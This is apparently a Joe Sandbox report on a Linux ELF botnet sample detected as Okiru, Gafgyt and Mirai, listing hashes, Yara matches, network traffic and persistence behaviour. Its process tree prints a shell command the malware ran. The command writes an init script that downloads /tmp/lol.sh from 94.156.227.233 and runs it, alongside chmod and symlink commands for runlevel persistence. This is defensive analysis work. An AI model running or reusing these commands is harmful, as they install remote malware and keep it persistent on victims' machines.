Edit tour

Linux Analysis Report
x86_64.nn.elf

Overview

General Information

Sample name:	x86_64.nn.elf
Analysis ID:	1580365
MD5:	2625d466242beff54d4aaa9db383064a
SHA1:	807ddc9abbe9b7ab0f4e34f6e41175c5703eda51
SHA256:	bdc1215cdb03a2143791d976a1474889a0f1408fc81cbe6331d5d3f7a7c858f8
Tags:	elfuser-abuse_ch
Infos:

Detection

Okiru

Score:	92
Range:	0 - 100
Whitelisted:	false

Signatures

Antivirus / Scanner detection for submitted sample

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Yara detected Okiru

Drops files in suspicious directories

Machine Learning detection for sample

Sample tries to persist itself using /etc/profile

Sample tries to persist itself using System V runlevels

Sample tries to set files in /etc globally writable

Detected TCP or UDP traffic on non-standard ports

Enumerates processes within the "proc" file system

Executes commands using a shell command-line interpreter

Executes the "chmod" command used to modify permissions

Executes the "mkdir" command used to create folders

Executes the "rm" command used to delete files or directories

Executes the "systemctl" command used for controlling the systemd system and service manager

Found strings indicative of a multi-platform dropper

Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable

Sample has stripped symbol table

Sample listens on a socket

Sample tries to set the executable flag

Writes shell script file to disk with an unusual file extension

Yara signature match

Classification

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1580365
Start date and time:	2024-12-24 11:37:10 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 4m 53s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultlinuxfilecookbook.jbs
Analysis system description:	Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:	default
Sample name:	x86_64.nn.elf
Detection:	MAL
Classification:	mal92.spre.troj.evad.linELF@0/9@0/0

Runtime Messages

Command:	/tmp/x86_64.nn.elf
PID:	6246
Exit Code:	139
Exit Code Info:	SIGSEGV (11) Segmentation fault invalid memory reference
Killed:	False
Standard Output:
Standard Error:

Process Tree

system is lnxubuntu20

dash New Fork (PID: 6223, Parent: 4331)

rm (PID: 6223, Parent: 4331, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -f /tmp/tmp.8HLRL3m5se /tmp/tmp.gTEsyrYvVk /tmp/tmp.bikVxVdgkX

dash New Fork (PID: 6224, Parent: 4331)

rm (PID: 6224, Parent: 4331, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -f /tmp/tmp.8HLRL3m5se /tmp/tmp.gTEsyrYvVk /tmp/tmp.bikVxVdgkX

x86_64.nn.elf (PID: 6246, Parent: 6152, MD5: 2625d466242beff54d4aaa9db383064a) Arguments: /tmp/x86_64.nn.elf

x86_64.nn.elf New Fork (PID: 6263, Parent: 6246)

sh (PID: 6263, Parent: 6246, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "systemctl enable custom.service >/dev/null 2>&1"

sh New Fork (PID: 6269, Parent: 6263)

systemctl (PID: 6269, Parent: 6263, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl enable custom.service

x86_64.nn.elf New Fork (PID: 6285, Parent: 6246)

sh (PID: 6285, Parent: 6246, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "chmod +x /etc/init.d/system >/dev/null 2>&1"

sh New Fork (PID: 6286, Parent: 6285)

chmod (PID: 6286, Parent: 6285, MD5: 739483b900c045ae1374d6f53a86a279) Arguments: chmod +x /etc/init.d/system

x86_64.nn.elf New Fork (PID: 6287, Parent: 6246)

sh (PID: 6287, Parent: 6246, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "ln -s /etc/init.d/system /etc/rcS.d/S99system >/dev/null 2>&1"

sh New Fork (PID: 6288, Parent: 6287)

ln (PID: 6288, Parent: 6287, MD5: e933cf05571f62c0157d4e2dfcaea282) Arguments: ln -s /etc/init.d/system /etc/rcS.d/S99system

x86_64.nn.elf New Fork (PID: 6289, Parent: 6246)

sh (PID: 6289, Parent: 6246, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "echo \"#!/bin/sh\n# /etc/init.d/sh\n\ncase \\\"$1\\\" in\n start)\n echo 'Starting sh'\n /bin/sh &\n wget http://94.156.227.233/ -O /tmp/lol.sh\n chmod +x /tmp/lol.sh\n /tmp/lol.sh &\n ;;\n stop)\n echo 'Stopping sh'\n killall sh\n ;;\n restart)\n $0 stop\n $0 start\n ;;\n *)\n echo \\\"Usage: $0 {start|stop|restart}\\\"\n exit 1\n ;;\nesac\nexit 0\" > /etc/init.d/sh"

x86_64.nn.elf New Fork (PID: 6290, Parent: 6246)

sh (PID: 6290, Parent: 6246, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "chmod +x /etc/init.d/sh >/dev/null 2>&1"

sh New Fork (PID: 6291, Parent: 6290)

chmod (PID: 6291, Parent: 6290, MD5: 739483b900c045ae1374d6f53a86a279) Arguments: chmod +x /etc/init.d/sh

x86_64.nn.elf New Fork (PID: 6292, Parent: 6246)

sh (PID: 6292, Parent: 6246, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "mkdir -p /etc/rc.d >/dev/null 2>&1"

sh New Fork (PID: 6293, Parent: 6292)

mkdir (PID: 6293, Parent: 6292, MD5: 088c9d1df5a28ed16c726eca15964cb7) Arguments: mkdir -p /etc/rc.d

x86_64.nn.elf New Fork (PID: 6294, Parent: 6246)

sh (PID: 6294, Parent: 6246, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "ln -s /etc/init.d/sh /etc/rc.d/S99sh >/dev/null 2>&1"

sh New Fork (PID: 6295, Parent: 6294)

ln (PID: 6295, Parent: 6294, MD5: e933cf05571f62c0157d4e2dfcaea282) Arguments: ln -s /etc/init.d/sh /etc/rc.d/S99sh

x86_64.nn.elf New Fork (PID: 6298, Parent: 6246)

x86_64.nn.elf New Fork (PID: 6300, Parent: 6298)

udisksd New Fork (PID: 6256, Parent: 799)

dumpe2fs (PID: 6256, Parent: 799, MD5: 5c66f7d8f7681a40562cf049ad4b72b4) Arguments: dumpe2fs -h /dev/dm-0

systemd New Fork (PID: 6282, Parent: 6281)

snapd-env-generator (PID: 6282, Parent: 6281, MD5: 3633b075f40283ec938a2a6a89671b0e) Arguments: /usr/lib/systemd/system-environment-generators/snapd-env-generator

udisksd New Fork (PID: 6308, Parent: 799)

dumpe2fs (PID: 6308, Parent: 799, MD5: 5c66f7d8f7681a40562cf049ad4b72b4) Arguments: dumpe2fs -h /dev/dm-0

udisksd New Fork (PID: 6330, Parent: 799)

dumpe2fs (PID: 6330, Parent: 799, MD5: 5c66f7d8f7681a40562cf049ad4b72b4) Arguments: dumpe2fs -h /dev/dm-0

cleanup

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
x86_64.nn.elf	JoeSecurity_Okiru	Yara detected Okiru	Joe Security
x86_64.nn.elf	Linux_Trojan_Gafgyt_9e9530a7	unknown	unknown	0xcc28:$a: F6 48 63 FF B8 36 00 00 00 0F 05 48 3D 00 F0 FF FF 48 89 C3
x86_64.nn.elf	Linux_Trojan_Gafgyt_807911a2	unknown	unknown	0xd417:$a: FE 48 39 F3 0F 94 C2 48 83 F9 FF 0F 94 C0 84 D0 74 16 4B 8D
x86_64.nn.elf	Linux_Trojan_Gafgyt_d4227dbf	unknown	unknown	0x9cce:$a: FF 48 81 EC D0 00 00 00 48 8D 84 24 E0 00 00 00 48 89 54 24 30 C7 04 24 18 00 0x9f8c:$a: FF 48 81 EC D0 00 00 00 48 8D 84 24 E0 00 00 00 48 89 54 24 30 C7 04 24 18 00
x86_64.nn.elf	Linux_Trojan_Gafgyt_d996d335	unknown	unknown	0xffce:$a: D0 EB 0F 40 38 37 75 04 48 89 F8 C3 49 FF C8 48 FF C7 4D 85 C0
x86_64.nn.elf	Linux_Trojan_Gafgyt_620087b9	unknown	unknown	0xcfd7:$a: 48 89 D8 48 83 C8 01 EB 04 48 8B 76 10 48 3B 46 08 72 F6 48 8B
x86_64.nn.elf	Linux_Trojan_Gafgyt_33b4111a	unknown	unknown	0xd2a2:$a: C1 83 E1 0F 74 1A B8 10 00 00 00 48 29 C8 48 8D 0C 02 48 89 DA 48
x86_64.nn.elf	Linux_Trojan_Mirai_e0cf29e2	unknown	unknown	0x5dd2:$a: 83 FE 01 76 12 0F B7 07 83 EE 02 48 83 C7 02 48 01 C2 83 FE 01
Click to see the 3 entries

Memory Dumps

Source	Rule	Description	Author	Strings
6246.1.0000000000400000.0000000000413000.r-x.sdmp	JoeSecurity_Okiru	Yara detected Okiru	Joe Security
6246.1.0000000000400000.0000000000413000.r-x.sdmp	Linux_Trojan_Gafgyt_9e9530a7	unknown	unknown	0xcc28:$a: F6 48 63 FF B8 36 00 00 00 0F 05 48 3D 00 F0 FF FF 48 89 C3
6246.1.0000000000400000.0000000000413000.r-x.sdmp	Linux_Trojan_Gafgyt_807911a2	unknown	unknown	0xd417:$a: FE 48 39 F3 0F 94 C2 48 83 F9 FF 0F 94 C0 84 D0 74 16 4B 8D
6246.1.0000000000400000.0000000000413000.r-x.sdmp	Linux_Trojan_Gafgyt_d4227dbf	unknown	unknown	0x9cce:$a: FF 48 81 EC D0 00 00 00 48 8D 84 24 E0 00 00 00 48 89 54 24 30 C7 04 24 18 00 0x9f8c:$a: FF 48 81 EC D0 00 00 00 48 8D 84 24 E0 00 00 00 48 89 54 24 30 C7 04 24 18 00
6246.1.0000000000400000.0000000000413000.r-x.sdmp	Linux_Trojan_Gafgyt_d996d335	unknown	unknown	0xffce:$a: D0 EB 0F 40 38 37 75 04 48 89 F8 C3 49 FF C8 48 FF C7 4D 85 C0
6246.1.0000000000400000.0000000000413000.r-x.sdmp	Linux_Trojan_Gafgyt_620087b9	unknown	unknown	0xcfd7:$a: 48 89 D8 48 83 C8 01 EB 04 48 8B 76 10 48 3B 46 08 72 F6 48 8B
6246.1.0000000000400000.0000000000413000.r-x.sdmp	Linux_Trojan_Gafgyt_33b4111a	unknown	unknown	0xd2a2:$a: C1 83 E1 0F 74 1A B8 10 00 00 00 48 29 C8 48 8D 0C 02 48 89 DA 48
6246.1.0000000000400000.0000000000413000.r-x.sdmp	Linux_Trojan_Mirai_e0cf29e2	unknown	unknown	0x5dd2:$a: 83 FE 01 76 12 0F B7 07 83 EE 02 48 83 C7 02 48 01 C2 83 FE 01
Process Memory Space: x86_64.nn.elf PID: 6246	JoeSecurity_Okiru	Yara detected Okiru	Joe Security
Click to see the 4 entries

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: x86_64.nn.elf

Avira: detected

Multi AV Scanner detection for submitted file

Source: x86_64.nn.elf

ReversingLabs: Detection: 26%

Machine Learning detection for sample

Source: x86_64.nn.elf

Joe Sandbox ML: detected

Source: x86_64.nn.elf

String: getinfo xxx/proc/self/exe(deleted)/proc/%s/exe/proc/..%s/%s/data/local/tmp//var/run/home/usr/bin/var/tmpsize=10Mtmpfs/tmp/tt/tmp/tt/system/proc/%d/proc/proc/%u/statusPPid:/proc/%u/cmdline-bash-sh/bin/sh94.156.227.2342surf2/proc/%d/exe/proc/%d/cmdlinewgetcurlunknown%s (URL: %s)/.socket/proc/%d/mountinfo/ /proc-altered/usr/lib/systemd/*/usr/sbin/*/usr/sbin/agetty/usr/sbin/cron/usr/lib/policykit-1/polkitd/usr/bin/dbus-daemon/usr/lib/openssh/sftp-server-sshd**deamon*/opt/app/monitor/z/secom//usr/lib/mnt/sys/boot/media/srv/sbin/etc/dev/telnethttpdtelnetddropbearencoder/var/tmp/wlancontarm.nnarm5.nnarm6.nnm68k.nnmips.nnmipsel.nnpowerpc.nnsparc.nnx86_32.nnx86_64.nntelnet.nn/init/opt/app/var/Challengeapp/hi3511gmDVRiboxusr/dvr_main _8182T_1108mnt/mtd/app/guivar/Kylinl0 c/udevdvar/tmp/soniahicorestm_hi3511_dvr/bin/busybox/usr/lib/systemd/systemdshellvar/run/home/Davincissh/var/spool/var/Sofiasshd/usr/compress/bin//compress/bin/compress/usr//root/dvr_gui//root/dvr_app//anko-app//opt/ping/pswiresharkechotcpdumpnetstatpythoniptablesnanonvimgdbpkillkillallapt/bin/loginnfstftpmallocwaitpidw/etc/motd%s

Source: global traffic

TCP traffic: 192.168.2.23:60008 -> 94.156.227.234:38242

Source: /tmp/x86_64.nn.elf (PID: 6246)

Socket: 0.0.0.0:38242

Jump to behavior

Source: unknown	TCP traffic detected without corresponding DNS query: 54.171.230.55
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 91.189.91.43
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 109.202.202.202
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234

Source: x86_64.nn.elf, system.16.dr, inittab.16.dr, sh.36.dr, profile.16.dr, custom.service.16.dr, bootcmd.16.dr	String found in binary or memory: http://94.156.227.233/
Source: x86_64.nn.elf, 6246.1.00007ffd2d90d000.00007ffd2d92e000.rw-.sdmp	String found in binary or memory: http://94.156.227.233/lol.sh
Source: x86_64.nn.elf	String found in binary or memory: http://94.156.227.233/oro1vk/usr/sbin/reboot/usr/bin/reboot/usr/sbin/shutdown/usr/bin/shutdown/usr/s

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 33606
Source: unknown	Network traffic detected: HTTP traffic on port 33606 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 43928 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 42836 -> 443

System Summary

Malicious sample detected (through community Yara rule)

Source: x86_64.nn.elf, type: SAMPLE	Matched rule: Linux_Trojan_Gafgyt_9e9530a7 Author: unknown
Source: x86_64.nn.elf, type: SAMPLE	Matched rule: Linux_Trojan_Gafgyt_807911a2 Author: unknown
Source: x86_64.nn.elf, type: SAMPLE	Matched rule: Linux_Trojan_Gafgyt_d4227dbf Author: unknown
Source: x86_64.nn.elf, type: SAMPLE	Matched rule: Linux_Trojan_Gafgyt_d996d335 Author: unknown
Source: x86_64.nn.elf, type: SAMPLE	Matched rule: Linux_Trojan_Gafgyt_620087b9 Author: unknown
Source: x86_64.nn.elf, type: SAMPLE	Matched rule: Linux_Trojan_Gafgyt_33b4111a Author: unknown
Source: x86_64.nn.elf, type: SAMPLE	Matched rule: Linux_Trojan_Mirai_e0cf29e2 Author: unknown
Source: 6246.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_9e9530a7 Author: unknown
Source: 6246.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_807911a2 Author: unknown
Source: 6246.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_d4227dbf Author: unknown
Source: 6246.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_d996d335 Author: unknown
Source: 6246.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_620087b9 Author: unknown
Source: 6246.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_33b4111a Author: unknown
Source: 6246.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_e0cf29e2 Author: unknown

Source: Initial sample	String containing 'busybox' found: /bin/busybox
Source: Initial sample	String containing 'busybox' found: getinfo xxx/proc/self/exe(deleted)/proc/%s/exe/proc/..%s/%s/data/local/tmp//var/run/home/usr/bin/var/tmpsize=10Mtmpfs/tmp/tt/tmp/tt/system/proc/%d/proc/proc/%u/statusPPid:/proc/%u/cmdline-bash-sh/bin/sh94.156.227.2342surf2/proc/%d/exe/proc/%d/cmdlinewgetcurlunknown%s (URL: %s)/.socket/proc/%d/mountinfo/ /proc-altered/usr/lib/systemd//usr/sbin//usr/sbin/agetty/usr/sbin/cron/usr/lib/policykit-1/polkitd/usr/bin/dbus-daemon/usr/lib/openssh/sftp-server-sshd*deamon/opt/app/monitor/z/secom//usr/lib/mnt/sys/boot/media/srv/sbin/etc/dev/telnethttpdtelnetddropbearencoder/var/tmp/wlancontarm.nnarm5.nnarm6.nnm68k.nnmips.nnmipsel.nnpowerpc.nnsparc.nnx86_32.nnx86_64.nntelnet.nn/init/opt/app/var/Challengeapp/hi3511gmDVRiboxusr/dvr_main _8182T_1108mnt/mtd/app/guivar/Kylinl0 c/udevdvar/tmp/soniahicorestm_hi3511_dvr/bin/busybox/usr/lib/systemd/systemdshellvar/run/home/Davincissh/var/spool/var/Sofiasshd/usr/compress/bin//compress/bin/compress/usr//root/dvr_gui//root/dvr_app//anko-app//opt/ping/pswiresharkechotcpdumpnetstatpy

Source: ELF static info symbol of initial sample

.symtab present: no

Source: x86_64.nn.elf, type: SAMPLE	Matched rule: Linux_Trojan_Gafgyt_9e9530a7 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = d6ad6512051e87c8c35dc168d82edd071b122d026dce21d39b9782b3d6a01e50, id = 9e9530a7-ad4d-4a44-b764-437b7621052f, last_modified = 2021-09-16
Source: x86_64.nn.elf, type: SAMPLE	Matched rule: Linux_Trojan_Gafgyt_807911a2 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = f409037091b7372f5a42bbe437316bd11c655e7a5fe1fcf83d1981cb5c4a389f, id = 807911a2-f6ec-4e65-924f-61cb065dafc6, last_modified = 2021-09-16
Source: x86_64.nn.elf, type: SAMPLE	Matched rule: Linux_Trojan_Gafgyt_d4227dbf reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 58c4b1d4d167876b64cfa10f609911a80284180e4db093917fea16fae8ccd4e3, id = d4227dbf-6ab4-4637-a6ba-0e604acaafb4, last_modified = 2021-09-16
Source: x86_64.nn.elf, type: SAMPLE	Matched rule: Linux_Trojan_Gafgyt_d996d335 reference_sample = b511eacd4b44744c8cf82d1b4a9bc6f1022fe6be7c5d17356b171f727ddc6eda, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = e9ccb8412f32187c309b0e9afcc3a6da21ad2f1ffa251c27f9f720ccb284e3ac, id = d996d335-e049-4052-bf36-6cd07c911a8b, last_modified = 2021-09-16
Source: x86_64.nn.elf, type: SAMPLE	Matched rule: Linux_Trojan_Gafgyt_620087b9 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 06cd7e6eb62352ec2ccb9ed48e58c0583c02fefd137cd048d053ab30b5330307, id = 620087b9-c87d-4752-89e8-ca1c16486b28, last_modified = 2021-09-16
Source: x86_64.nn.elf, type: SAMPLE	Matched rule: Linux_Trojan_Gafgyt_33b4111a reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 9c3b63b9a0f54006bae12abcefdb518904a85f78be573f0780f0a265b12d2d6e, id = 33b4111a-e59e-48db-9d74-34ca44fcd9f5, last_modified = 2021-09-16
Source: x86_64.nn.elf, type: SAMPLE	Matched rule: Linux_Trojan_Mirai_e0cf29e2 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 3f124c3c9f124264dfbbcca1e4b4d7cfcf3274170d4bf8966b6559045873948f, id = e0cf29e2-88d7-4aa4-b60a-c24626f2b246, last_modified = 2021-09-16
Source: 6246.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_9e9530a7 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = d6ad6512051e87c8c35dc168d82edd071b122d026dce21d39b9782b3d6a01e50, id = 9e9530a7-ad4d-4a44-b764-437b7621052f, last_modified = 2021-09-16
Source: 6246.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_807911a2 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = f409037091b7372f5a42bbe437316bd11c655e7a5fe1fcf83d1981cb5c4a389f, id = 807911a2-f6ec-4e65-924f-61cb065dafc6, last_modified = 2021-09-16
Source: 6246.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_d4227dbf reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 58c4b1d4d167876b64cfa10f609911a80284180e4db093917fea16fae8ccd4e3, id = d4227dbf-6ab4-4637-a6ba-0e604acaafb4, last_modified = 2021-09-16
Source: 6246.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_d996d335 reference_sample = b511eacd4b44744c8cf82d1b4a9bc6f1022fe6be7c5d17356b171f727ddc6eda, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = e9ccb8412f32187c309b0e9afcc3a6da21ad2f1ffa251c27f9f720ccb284e3ac, id = d996d335-e049-4052-bf36-6cd07c911a8b, last_modified = 2021-09-16
Source: 6246.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_620087b9 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 06cd7e6eb62352ec2ccb9ed48e58c0583c02fefd137cd048d053ab30b5330307, id = 620087b9-c87d-4752-89e8-ca1c16486b28, last_modified = 2021-09-16
Source: 6246.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_33b4111a reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 9c3b63b9a0f54006bae12abcefdb518904a85f78be573f0780f0a265b12d2d6e, id = 33b4111a-e59e-48db-9d74-34ca44fcd9f5, last_modified = 2021-09-16
Source: 6246.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_e0cf29e2 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 3f124c3c9f124264dfbbcca1e4b4d7cfcf3274170d4bf8966b6559045873948f, id = e0cf29e2-88d7-4aa4-b60a-c24626f2b246, last_modified = 2021-09-16

Source: classification engine

Classification label: mal92.spre.troj.evad.linELF@0/9@0/0

Persistence and Installation Behavior

Sample tries to persist itself using /etc/profile

Source: /tmp/x86_64.nn.elf (PID: 6246)

File: /etc/profile

Jump to behavior

Sample tries to persist itself using System V runlevels

Source: /tmp/x86_64.nn.elf (PID: 6246)	File: /etc/rc.local	Jump to behavior
Source: /usr/bin/ln (PID: 6288)	File: /etc/rcS.d/S99system -> /etc/init.d/system	Jump to behavior
Source: /usr/bin/ln (PID: 6295)	File: /etc/rc.d/S99sh -> /etc/init.d/sh	Jump to behavior

Sample tries to set files in /etc globally writable

Source: /tmp/x86_64.nn.elf (PID: 6246)	File: /etc/rc.local (bits: - usr: rx grp: rx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6286)	File: /etc/init.d/system (bits: - usr: rx grp: rx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6291)	File: /etc/init.d/sh (bits: - usr: rx grp: rx all: rwx)	Jump to behavior

Source: /tmp/x86_64.nn.elf (PID: 6300)	File opened: /proc/6054/cmdline	Jump to behavior
Source: /tmp/x86_64.nn.elf (PID: 6300)	File opened: /proc/6330/status	Jump to behavior
Source: /tmp/x86_64.nn.elf (PID: 6300)	File opened: /proc/6379/status	Jump to behavior
Source: /tmp/x86_64.nn.elf (PID: 6300)	File opened: /proc/6391/status	Jump to behavior
Source: /tmp/x86_64.nn.elf (PID: 6300)	File opened: /proc/6390/status	Jump to behavior
Source: /tmp/x86_64.nn.elf (PID: 6300)	File opened: /proc/6393/status	Jump to behavior
Source: /tmp/x86_64.nn.elf (PID: 6300)	File opened: /proc/6392/status	Jump to behavior
Source: /tmp/x86_64.nn.elf (PID: 6300)	File opened: /proc/799/cmdline	Jump to behavior
Source: /tmp/x86_64.nn.elf (PID: 6300)	File opened: /proc/6326/status	Jump to behavior
Source: /tmp/x86_64.nn.elf (PID: 6300)	File opened: /proc/6325/status	Jump to behavior
Source: /tmp/x86_64.nn.elf (PID: 6300)	File opened: /proc/6369/status	Jump to behavior
Source: /tmp/x86_64.nn.elf (PID: 6300)	File opened: /proc/6327/status	Jump to behavior
Source: /tmp/x86_64.nn.elf (PID: 6300)	File opened: /proc/6329/status	Jump to behavior
Source: /tmp/x86_64.nn.elf (PID: 6300)	File opened: /proc/6384/status	Jump to behavior
Source: /tmp/x86_64.nn.elf (PID: 6300)	File opened: /proc/6383/status	Jump to behavior
Source: /tmp/x86_64.nn.elf (PID: 6300)	File opened: /proc/6386/status	Jump to behavior
Source: /tmp/x86_64.nn.elf (PID: 6300)	File opened: /proc/6385/status	Jump to behavior
Source: /tmp/x86_64.nn.elf (PID: 6300)	File opened: /proc/6388/status	Jump to behavior
